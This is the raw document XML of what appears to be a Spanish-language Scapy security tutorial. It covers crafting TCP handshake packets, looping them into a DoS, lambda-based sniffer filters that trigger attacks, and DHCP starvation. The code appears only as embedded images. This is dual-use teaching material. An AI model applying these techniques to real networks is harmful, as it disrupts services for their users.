    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Creación del paquete IP/TCP que contiene el “flag” de SYN ( necesario para el Three Way Handshake)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Envío y captura del número de secuencia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Montaje del paquete TCP con carga HTTP que añade el número de secuencia como ACK +1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">El ejercicio anterior intentaba completar un Three Way Handshake que completaba correctamente y generaba un paquete justo después tipo cabecera el formato de la cabecera no era del todo correcta y aparte por algun motivo el servicio HTTP enviaba un RST al cliente. Para realizar estos ataques con Scapy es imprescindible utilizar Python creando un algoritmo recurrente que vendría a ser un ataque DOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">En internet hay múltiples ejemplos que utilizan las librerías de Scapy para múltiples ataques esto aporta mucho conocimiento a los usuarios que tienen interés en el ámbito de la seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LAMBDA EXPRESION </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scapy tiene un modo que permite personalizar la información que muestra el sniffer. El uso de estas sentencias es relativamente en modo comandos (es el que veremos a continuación), lo realmente interesante es que las LAMBDA EXPRESION dentro de un script pueden mostrar información relevante para el hacker por ejemplo: un hacker quiere crear un script que capture solo la paqueteria de un tipo concreto y que cuando obtenga un paquete de dicho formato inspeccione uno de sus campos y a partir de ese momento realizar el ataque en concreto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Las LAMBDA EXPRESION son aquellas sentencias que pueden formatear el usuario a su gusto vamos a ver ahora algunos ejemplos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="673100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28" name="image59.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image59.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="673100"/>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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2676525" cy="2409825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="25" name="image56.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image56.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2676525" cy="2409825"/>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contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="546100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050" cy="546100"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Realiza una expresión Lambda que nos muestre la MAC de origen, la MAC de destino, IP de origen, IP de destino y el estado del Flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5810250" cy="547688"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5810250" cy="547688"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000106">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scapy: DHCP Starvation/Exhaustion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5734050" cy="2933700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image48.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5734050"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116">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scapy soporta múltiples protocolos si hablamos de DHCP este no es una excepción. Creando una estructura con la propiedad de Options inicializada veremos que es muy fácil reclamar una dirección ip a un servicio DHCP no administrado. Los administradores de red deben tener en cuenta que su servicio DHCP pueden sufrir estos ataques porque son relativamente fáciles de realizar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primero de todo hay que entender que paqueteria intercambia y cual es requerida en una transacción DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4029075" cy="1885950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="34" name="image71.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image71.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4029075" cy="1885950"/>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contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
